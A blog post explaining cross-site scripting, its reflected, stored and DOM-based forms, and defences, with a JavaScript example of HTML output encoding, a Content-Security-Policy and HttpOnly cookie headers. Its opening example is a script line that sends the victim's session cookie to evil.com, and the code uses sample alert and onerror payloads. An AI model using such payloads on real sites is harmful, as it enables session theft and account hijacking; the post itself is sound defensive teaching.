Kubernate

Wednesday, November 12, 2025

XSS - Cross-Site Scripting

Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious scripts into webpages viewed by other users. These scripts run in the victim’s browser and can steal data, hijack sessions, or deface websites.


🕷️ What Is XSS?

XSS is a client-side code injection attack where malicious JavaScript is embedded into a trusted website. When unsuspecting users visit the site, the script executes in their browser as if it came from the site itself.

Example:

<script>document.location='http://evil.com?cookie='+document.cookie</script>

This script steals the user's session cookie and sends it to an attacker-controlled domain.


⚠️ Types of XSS Attacks

  1. Reflected XSS

    • Injected via URL or form input.
    • Payload is reflected in the response.
    • Common in search forms or login pages.
  2. Stored XSS

    • Malicious script is stored in the database (e.g., in comments or user profiles).
    • Every visitor to the page executes the script.
  3. DOM-based XSS

    • Manipulates the DOM environment in the browser.
    • Doesn’t rely on server-side injection; occurs entirely on the client side.

Sources:


🔐 How to Prevent XSS

  • Input Sanitization: Strip or escape dangerous characters (<, >, ', ", /, etc.).
  • Output Encoding: Encode data before rendering it in HTML, JavaScript, or URLs.
  • Content Security Policy (CSP): Restrict sources of executable scripts.
  • Use Secure Frameworks: Libraries like React or Angular automatically escape output.
  • HttpOnly Cookies: Prevent JavaScript from accessing session cookies.
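The following is an added example, not code from the original post, written in plain JavaScript for Node.js with no dependencies. It ties the attack types listed above to the mitigations in this list: a reflected search handler and a stored-comment renderer, each protected by HTML output encoding, an invariant check that a test suite can run on every encoded fragment, and the Content-Security-Policy and HttpOnly cookie header values the list recommends. All function names, the nonce, the session id and the sample payloads and comments are constructed for illustration.

```javascript
// Added example, not code from the original post: HTML output encoding as
// the primary XSS defence, exercised against a reflected and a stored
// payload, plus the CSP and cookie headers the post recommends.

// Entity references for the five characters that can change HTML structure.
// This encoder is for text placed in an element body or a quoted attribute
// value; JavaScript and URL contexts need their own encoders.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Reflected XSS: a search term from the URL is echoed into the response.
// The vulnerable handler concatenates the raw term; the safe one encodes it.
function searchPageVulnerable(term) {
  return `<h1>Results for: ${term}</h1>`;
}

function searchPageSafe(term) {
  return `<h1>Results for: ${escapeHtml(term)}</h1>`;
}

// Stored XSS: comments persisted earlier are rendered for every visitor.
// `comments` stands in for rows read from the database.
function renderComments(comments) {
  return comments
    .map((c) => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join('\n');
}

// Invariant a test suite can assert on every user-supplied fragment after
// encoding: no raw markup delimiters remain, and every '&' starts a
// complete entity reference.
function isSafeTextFragment(fragment) {
  if (/[<>"']/.test(fragment)) return false;
  const withoutEntities = fragment.replace(/&(?:[a-z]+|#x[0-9a-f]+|#\d+);/gi, '');
  return !withoutEntities.includes('&');
}

// Content-Security-Policy value that forbids inline scripts, so an injected
// <script> block or on* handler would not run even where encoding was
// missed, and restricts script sources to the page's own origin plus a
// per-response nonce (the nonce must be fresh and unguessable per response).
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

// Set-Cookie value for a session cookie that page scripts cannot read
// (HttpOnly), that travels only over TLS (Secure) and is not attached to
// cross-site requests (SameSite=Strict).
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Constructed sample inputs: classic test payloads, not real attack traffic.
const REFLECTED_PAYLOAD = '<script>alert(1)</script>';
const STORED_COMMENTS = [
  { author: 'alice', body: 'Great post & thanks!' },
  { author: 'mallory', body: '<img src=x onerror="alert(1)">' },
];

console.log(searchPageVulnerable(REFLECTED_PAYLOAD)); // script tag survives
console.log(searchPageSafe(REFLECTED_PAYLOAD));       // shown as literal text
console.log(renderComments(STORED_COMMENTS));
console.log(buildCsp('constructed-nonce'));
console.log(sessionCookieHeader('constructed-session-id'));
```

Run it with `node xss_encoding.js` (any filename works). Note that `escapeHtml` is only correct for HTML element bodies and quoted attribute values; data placed inside a `<script>` block, an event handler, a URL or a CSS value needs the encoder for that context, and the CSP is a second layer that catches the cases where an encoder was forgotten, not a replacement for encoding.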

🧠 Real-World Impact

XSS vulnerabilities have affected major platforms like Facebook, Twitter, and eBay. Attackers have used them to:

  • Steal credentials
  • Spread worms
  • Redirect users to phishing sites

If you're building microservices or REST APIs with Spring Boot, I can show you how to sanitize inputs and configure security headers to mitigate XSS. 
